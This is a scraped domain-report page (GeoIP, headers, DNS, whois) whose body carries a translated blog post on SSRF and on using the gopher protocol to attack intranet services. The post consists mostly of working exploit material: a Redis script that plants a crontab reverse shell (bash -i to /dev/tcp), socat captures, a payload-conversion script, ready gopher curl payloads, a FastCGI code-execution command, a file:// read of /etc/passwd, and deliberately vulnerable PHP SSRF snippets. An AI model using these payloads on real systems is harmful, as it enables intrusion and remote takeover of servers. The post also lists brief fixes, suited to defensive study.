zbojia.com Report


  • Server:Apache/2.4.18 (Ubunt...

    Main IP address: 120.77.209.122. Server location: Hangzhou, China. ISP: Aliyun Computing Co. Ltd. TLD: com. Country code: CN

    The description: Sword not yet properly girded, yet one step out the door is already the jianghu; wine still warm, yet the first sip cannot tell heaven from earth...

    This report was updated on 21-Sep-2018

Created Date:2017-03-01
Changed Date:2017-09-08

Technical data of the zbojia.com


GeoIP lookup provides a host's latitude, longitude, ISP (Internet Service Provider) and similar information. Our GeoIP service located the host zbojia.com: it is currently hosted in China, and its service provider is Aliyun Computing Co. Ltd.

Latitude: 30.293649673462
Longitude: 120.16142272949
Country: China (CN)
City: Hangzhou
Region: Zhejiang
ISP: Aliyun Computing Co. Ltd

HTTP Header Analysis


HTTP headers are the part of the HTTP protocol exchanged between the user's browser and the web server (here Apache/2.4.18 (Ubuntu)): the request headers describe what the browser wants and will accept, and the response headers below describe what the server sent back.

Content-Length:13281
Content-Encoding:gzip
Vary:Accept-Encoding
Keep-Alive:timeout=5, max=100
Server:Apache/2.4.18 (Ubuntu)
Connection:Keep-Alive
Date:Thu, 20 Sep 2018 20:06:03 GMT
Content-Type:text/html; charset=UTF-8
X-Pingback:http://www.zbojia.com/index.php/action/xmlrpc

DNS

soa:dns27.hichina.com. hostmaster.hichina.com. 2017090900 3600 1200 86400 360
ns:dns28.hichina.com.
dns27.hichina.com.
ipv4:IP:120.77.209.122
ASN:37963
OWNER:CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
Country:CN

HtmlToText

Site tagline: 剑未配妥,出门已是江湖 酒尚余温,入口不识乾坤 (Sword not yet properly girded, yet one step out the door is already the jianghu; wine still warm, yet the first sip cannot tell heaven from earth.)

SSRF principles and using gopher to attack intranet applications
Author:  Date: 2018-05-25  Category: Penetration testing  Comments

1. SSRF overview

SSRF (Server-Side Request Forgery) is a vulnerability in which a link crafted by the attacker is passed to the server side, which then issues the request itself. It is generally used to probe or attack internal-network services from the outside.

2. Exploitation

Reading files with the file protocol:

    root@happy-pc:~# curl 127.0.0.1/ssrf.php?url=file:///etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    ......

Probing ports with the dict protocol:

    root@happy-pc:~# curl 127.0.0.1/ssrf.php?url=dict://127.0.0.1:6379/info
    -ERR Syntax error, try CLIENT (LIST | KILL | GETNAME | SETNAME | PAUSE | REPLY)
    $2664
    # Server
    redis_version:4.0.1
    redis_git_sha1:00000000
    ......

Crafting a POST request to an intranet host with the gopher protocol:

    root@happy-pc:~# curl 127.0.0.1/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%2f_POST%20%2fpost.php%20HTTP%2f1.1%250d%250aHost%3a%20127.0.0.1%250d%250aUser-Agent%3a%20curl%2f7.43.0%250d%250aAccept%3a%20*%2f*%250d%250aContent-Length%3a%2029%250d%250aContent-Type%3a%20application%2fx-www-form-urlencoded%250d%250a%250d%250apost=1
    root@happy-pc:~# curl 127.0.0.1/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a80%2f_POST%2520%252fpost.php%2520HTTP%252f1.1%250d%250aHost%3a127.0.0.1%250d%250aUser-Agent%3a%2520curl%2f7.43.0%250d%250aAccept%3a*%2f*%250d%250aContent-Length%3a49%250d%250aContent-Type%3a%2520application%2fx-www-form-urlencoded%250d%250a%250d%250apost%3d1
    HTTP/1.1 200 OK
    Date: Fri, 25 May 2018 11:49:09 GMT
    Server: Apache/2.4.27 (Debian)
    Content-Length: 6
    Connection: close
    Content-Type: text/html; charset=utf-8

    ok!1

3. Using gopher to attack intranet applications

The following is reproduced from a post by an expert who already wrote it up well: SSRF for PHP.

3.1 Redis reverse shell

Exploit script (shell.sh):

    # usage: bash shell.sh <host> <port>
    echo -e "\n\n\n*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1\n\n\n"|redis-cli -h $1 -p $2 -x set 1
    redis-cli -h $1 -p $2 config set dir /var/spool/cron/
    redis-cli -h $1 -p $2 config set dbfilename root
    redis-cli -h $1 -p $2 save
    redis-cli -h $1 -p $2 quit

Run the script locally:

    bash shell.sh 127.0.0.1 6379

To capture the TCP packets of the Redis attack, use socat for port forwarding. The forwarding command:

    socat -v tcp-listen:4444,fork tcp-connect:localhost:6379

This forwards local port 4444 to local port 6379: connecting to port 4444 on this host actually reaches port 6379. Run the script against the forwarded port:

    bash shell.sh 127.0.0.1 4444

The captured data:

    > 2017/10/11 01:24:52.432446 length=85 from=0 to=84
    *3\r
    $3\r
    set\r
    $1\r
    1\r
    $58\r



    */1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1



    \r
    < 2017/10/11 01:24:52.432685 length=5 from=0 to=4
    +OK\r
    > 2017/10/11 01:24:52.435153 length=57 from=0 to=56
    *4\r
    $6\r
    config\r
    $3\r
    set\r
    $3\r
    dir\r
    $16\r
    /var/spool/cron/\r
    < 2017/10/11 01:24:52.435332 length=5 from=0 to=4
    +OK\r
    > 2017/10/11 01:24:52.437594 length=52 from=0 to=51
    *4\r
    $6\r
    config\r
    $3\r
    set\r
    $10\r
    dbfilename\r
    $4\r
    root\r
    < 2017/10/11 01:24:52.437760 length=5 from=0 to=4
    +OK\r
    > 2017/10/11 01:24:52.439943 length=14 from=0 to=13
    *1\r
    $4\r
    save\r
    < 2017/10/11 01:24:52.443318 length=5 from=0 to=4
    +OK\r
    > 2017/10/11 01:24:52.446034 length=14 from=0 to=13
    *1\r
    $4\r
    quit\r
    < 2017/10/11 01:24:52.446148 length=5 from=0 to=4
    +OK\r

The conversion rules are:

  • If the first character is > or <, drop the line; it is the request or response timestamp.
  • If the first three characters are +OK, drop the line; it is the returned string.
  • Replace the \r string with %0d%0a.
  • Replace a blank line with %0a.

A script that does the conversion, tran2gopher.py, run as:

    python tran2gopher.py socat.log

    #coding: utf-8
    #author: joychou
    import sys

    exp = ''
    with open(sys.argv[1]) as f:
        for line in f.readlines():
            if line[0] in '><+':
                continue
            # check whether the 2nd- and 3rd-to-last characters are \r
            elif line[-3:-1] == r'\r':
                # if the line is only \r, replace it with %0a%0d%0a
                if len(line) == 3:
                    exp = exp + '%0a%0d%0a'
                else:
                    line = line.replace(r'\r', '%0d%0a')
                    # strip the trailing newline
                    line = line.replace('\n', '')
                    exp = exp + line
            # blank line: replace with %0a
            elif line == '\x0a':
                exp = exp + '%0a'
            else:
                line = line.replace('\n', '')
                exp = exp + line
    print(exp)

The result:

    *3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$58%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a

Note that if you change the IP and port, the preceding $58 must also change: $58 means the string is 58 bytes long. In the exp above that string is %0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1%0a%0a%0a%0a, i.e. 3+51+4=58. If you change the address to 42.256.24.73, $58 becomes $61, and so on; the '$' character needs to be URL-encoded.

Test locally with curl whether it was written successfully:

    curl -v 'gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$58%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a'

Five OK responses come back:

    +OK
    +OK
    +OK
    +OK
    +OK

which shows it should be fine. Then check the field written into Redis and the contents of the crontab. The field in the Redis database is "\n\n\n*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1\n\n\n\n", and the crontab contents are also correct.

3.2 Attacking FastCGI

Requirements:

  • libcurl version >= 7.45.0
  • php-fpm listening on a TCP port
  • php-fpm version >= 5.3.3
  • the absolute path of any PHP file on the server is known

Because the exp contains %00, curl versions below 7.45.0 truncate the gopher request at the %00. From https://curl.haxx.se/changes.html#7_45_0:

    Fixed in 7.45.0 - October 7 2015
    gopher: don't send NUL byte

Listen on a port to capture the traffic with nc -lvv 2333 > 1.txt, then run the exp so that the traffic is sent to port 2333:

    python fpm.py -c "<?php system('echo sectest > /tmp/1.php'); exit;?>" -p 2333 127.0.0.1 /usr/local/nginx/html/p.php

URL-encode the capture:

    from urllib.parse import quote  # Python 2: from urllib import quote

    # 1.txt holds the raw FastCGI request captured by nc
    with open('1.txt', 'rb') as f:
        print(quote(f.read()))

This yields the gopher exp: the URL-encoded FastCGI request from 1.txt. Run the exp against the php-fpm port, passing that encoded request as the gopher path after the underscore:

    curl 'gopher://127.0.0.1:9000/_<URL-encoded contents of 1.txt>'

4. Vulnerable code

SSRF via curl:

    <?php
    function curl($url){
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_exec($ch);
        curl_close($ch);
    }
    // the user-supplied URL is fetched with no scheme or host restriction
    $url = $_GET['url'];
    curl($url);

SSRF via file_get_contents:

    <?php
    $url = $_GET['url'];
    echo file_get_contents($url);

SSRF via fsockopen:

    <?php
    function getfile($host,$port,$link) {
        $fp = fsockopen($host, intval($port), $errno, $errstr, 30);
        if (!$fp) {
            echo "$errstr (error number $errno) \n";
        } else {
            $out = "GET $link HTTP/1.1\r\n";
            $out .= "Host: $host\r\n";
            $out .= "Connection: close\r\n\r\n";
            $out .= "\r\n";
            fwrite($fp, $out);
            $contents='';
            while (!feof($fp)) {
                $contents.= fgets($fp, 1024);
            }
            fclose($fp);
            return $contents;
        }
    }

5. Fixes

  • Restrict the protocol to http and https.
  • Forbid 30x redirects.
  • Set a URL whitelist, or block internal-network IPs.

6. References

  • SSRF to getshell
  • 利用 Gopher 协议拓展攻击面 (Using the Gopher protocol to extend the attack surface)
  • wavr ssrf

0CTF2018 XSS bl0g reproduction
Author:  Date: 2018-04-15  Category: web  11 comments

1. CSP

    Content-Security-Policy: script-src 'self' 'unsafe-inline'
    Content-Security-Policy: default-src 'none'; script-src 'nonce-haovzhmfa+dpxvdtxrzpzq72fjs=' 'strict-dynamic'; style-src 'self'; img-src 'self' data:; media-src 'self'; font-src 'self' data:; connect-src 'self'


Whois Information


Whois is a protocol for accessing domain registration information. It tells you when the website was registered, when the registration expires, and the contact details of the site. In a nutshell, it includes the following information:

Domain Name: ZBOJIA.COM
Registry Domain ID: 2101424850_DOMAIN_COM-VRSN
Registrar WHOIS Server: grs-whois.hichina.com
Registrar URL: http://www.net.cn
Updated Date: 2017-09-08T16:41:58Z
Creation Date: 2017-03-01T12:44:32Z
Registry Expiry Date: 2022-03-01T12:44:32Z
Registrar: Alibaba Cloud Computing (Beijing) Co., Ltd.
Registrar IANA ID: 420
Registrar Abuse Contact Email: [email protected]
Registrar Abuse Contact Phone: +86.95187
Domain Status: ok https://icann.org/epp#ok
Name Server: DNS27.HICHINA.COM
Name Server: DNS28.HICHINA.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2019-08-11T16:22:18Z <<<

For more information on Whois status codes, please visit https://icann.org/epp

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.

  REGISTRAR Alibaba Cloud Computing (Beijing) Co., Ltd.

SERVERS

  SERVER com.whois-servers.net

  ARGS domain =zbojia.com

  PORT 43

  TYPE domain

DOMAIN

  NAME zbojia.com

  CHANGED 2017-09-08

  CREATED 2017-03-01

STATUS
ok https://icann.org/epp#ok

NSERVER

  DNS27.HICHINA.COM 106.11.211.69

  DNS28.HICHINA.COM 106.11.211.70

  REGISTERED yes
